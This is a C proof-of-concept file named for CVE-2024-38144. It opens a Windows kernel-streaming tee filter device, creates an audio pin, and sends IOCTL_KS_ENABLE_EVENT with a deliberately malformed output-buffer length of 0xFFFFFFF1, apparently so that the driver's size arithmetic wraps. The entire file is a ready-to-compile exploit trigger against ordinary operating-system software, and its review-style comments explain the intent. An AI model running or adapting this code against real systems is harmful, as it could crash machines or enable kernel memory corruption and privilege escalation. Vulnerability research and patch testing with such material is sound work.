CVE-2024-38144.c
#include <Windows.h>
#include <ks.h>
#include <stdio.h>
#include <ksmedia.h>
#include <initguid.h>
#pragma comment(lib, "ksuser.lib")
/* Device-interface path that main() passes to CreateFileW(). The macro name
 * suggests a kernel-streaming "tee" filter; presumably that is the device
 * behind this interface GUID pair -- confirm against the target system. */
#define TEE_INTERFACE L"\\\\?\\root#system#0000#{cf1dda2c-9743-11d0-a3ee-00a0c9223196}\\{cfd669f1-9bc2-11d0-8299-0000f822fe8a}&{cf1dda2c-9743-11d0-a3ee-00a0c9223196}"
/* Output-buffer length that SendIoctlKsEnableEvent() declares to
 * DeviceIoControl(). It does not describe the buffer actually supplied, which
 * is a single KSEVENTDATA; the mismatch is what this test case exercises. */
#define MALFORMED_OUTPUTBUFFERLENGTH 0xFFFFFFF1
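/**
 * Instantiate a pin on a kernel-streaming filter using a PCM audio format.
 *
 * Builds the request KsCreatePin() consumes: a KSPIN_CONNECT header followed
 * immediately in memory by the KSDATAFORMAT describing the stream.
 *
 * @param hDevice  Handle to the filter, opened by the caller.
 * @param pinId    Identifier of the pin to instantiate.
 * @return The pin handle on success (the caller closes it with CloseHandle()),
 *         or NULL if the request could not be built or the pin was not created.
 */
HANDLE CreateKsPin(HANDLE hDevice, ULONG pinId) {
    /* Header and format must be contiguous, so they share one allocation.
     * calloc() zeroes the block, which leaves every Flags field at 0 and
     * PinToHandle at NULL. */
    ULONG connSize = sizeof(KSPIN_CONNECT) + sizeof(KSDATAFORMAT);
    PKSPIN_CONNECT ksPinConn = (PKSPIN_CONNECT)calloc(1, connSize);
    if (ksPinConn == NULL) {
        printf("Failed to create pin.\n");
        return NULL;
    }

    ksPinConn->Interface.Set = KSINTERFACESETID_Standard;
    ksPinConn->Interface.Id = KSINTERFACE_STANDARD_STREAMING;
    ksPinConn->Medium.Set = KSMEDIUMSETID_Standard;
    ksPinConn->Medium.Id = KSMEDIUM_STANDARD_DEVIO;
    ksPinConn->PinId = pinId;
    ksPinConn->Priority.PriorityClass = KSPRIORITY_NORMAL;
    ksPinConn->Priority.PrioritySubClass = KSPRIORITY_NORMAL;

    /* The data format sits directly behind the connect header. */
    PKSDATAFORMAT ksDataFormat = (PKSDATAFORMAT)(ksPinConn + 1);
    /* NOTE(review): the specifier is WAVEFORMATEX, yet FormatSize covers only
     * the KSDATAFORMAT header and no WAVEFORMATEX payload is appended. */
    ksDataFormat->FormatSize = sizeof(KSDATAFORMAT);
    ksDataFormat->MajorFormat = KSDATAFORMAT_TYPE_AUDIO;
    ksDataFormat->SubFormat = KSDATAFORMAT_SUBTYPE_PCM;
    ksDataFormat->Specifier = KSDATAFORMAT_SPECIFIER_WAVEFORMATEX;

    HANDLE pinHandle = NULL;
    DWORD status = KsCreatePin(hDevice, ksPinConn, GENERIC_READ, &pinHandle);
    free(ksPinConn);

    /* KsCreatePin() is documented to return a Win32 error code, ERROR_SUCCESS
     * on success. SUCCEEDED() only tests the HRESULT sign bit, so it would
     * accept ordinary positive error codes as success. */
    if (status != ERROR_SUCCESS) {
        printf("Failed to create pin.\n");
        return NULL;
    }
    return pinHandle;
}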
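/**
 * Send IOCTL_KS_ENABLE_EVENT for KSEVENT_CONNECTION_ENDOFSTREAM on a pin.
 *
 * The request declares an output-buffer length of MALFORMED_OUTPUTBUFFERLENGTH
 * while the buffer actually supplied is one KSEVENTDATA. The receiving driver
 * therefore sees a length that does not match the caller's memory; a correct
 * handler has to reject or bound it before using it in any size calculation.
 * NOTE(review): the value lies just below the 32-bit maximum, presumably so
 * that arithmetic on it wraps -- confirm against the advisory for the CVE
 * named in this file's title.
 *
 * @param pinHandle  Pin handle obtained from CreateKsPin().
 * @return TRUE if DeviceIoControl() reported success, FALSE otherwise.
 */
BOOL SendIoctlKsEnableEvent(HANDLE pinHandle) {
    KSEVENT ksevent = {0};
    ksevent.Set = KSEVENTSETID_Connection;
    ksevent.Id = KSEVENT_CONNECTION_ENDOFSTREAM;
    ksevent.Flags = KSEVENT_TYPE_ENABLE;

    /* Auto-reset, initially non-signalled, unnamed event for the notification. */
    HANDLE hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
    if (hEvent == NULL) {
        printf("Failed to create event.\n");
        return FALSE;
    }

    KSEVENTDATA eventData = {0};
    eventData.NotificationType = KSEVENTF_EVENT_HANDLE;
    eventData.EventHandle.Event = hEvent;

    DWORD bytesReturned = 0;
    BOOL result = DeviceIoControl(
        pinHandle,
        IOCTL_KS_ENABLE_EVENT,
        &ksevent,
        sizeof(ksevent),
        &eventData,
        MALFORMED_OUTPUTBUFFERLENGTH, /* intentionally not sizeof(eventData) */
        &bytesReturned,
        NULL
    );

    /* The event handle is never handed back to the caller, so release it here
     * on both the success and the failure path instead of leaking it. */
    CloseHandle(hEvent);

    if (!result) {
        printf("Failed to send IOCTL_KS_ENABLE_EVENT.\n");
        return FALSE;
    }
    return TRUE;
}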
/*
 * Entry point: opens the TEE_INTERFACE device, creates pin 0 on it, sends the
 * enable-event request, and releases both handles.
 * Returns 0 when the request was sent, -1 when any step failed.
 */
int main() {
    int exitCode = -1;

    HANDLE filter = CreateFileW(TEE_INTERFACE,
                                GENERIC_READ | GENERIC_WRITE,
                                0,             /* no sharing */
                                NULL,
                                OPEN_EXISTING,
                                0,
                                NULL);
    if (filter == INVALID_HANDLE_VALUE) {
        printf("Failed to open device.\n");
        return exitCode;
    }

    HANDLE pin = CreateKsPin(filter, 0);
    if (pin != NULL) {
        /* Each helper prints its own failure message. */
        if (SendIoctlKsEnableEvent(pin)) {
            printf("IOCTL_KS_ENABLE_EVENT sent successfully.\n");
            exitCode = 0;
        }
        CloseHandle(pin);
    }

    /* The filter handle is released on every path that opened it. */
    CloseHandle(filter);
    return exitCode;
}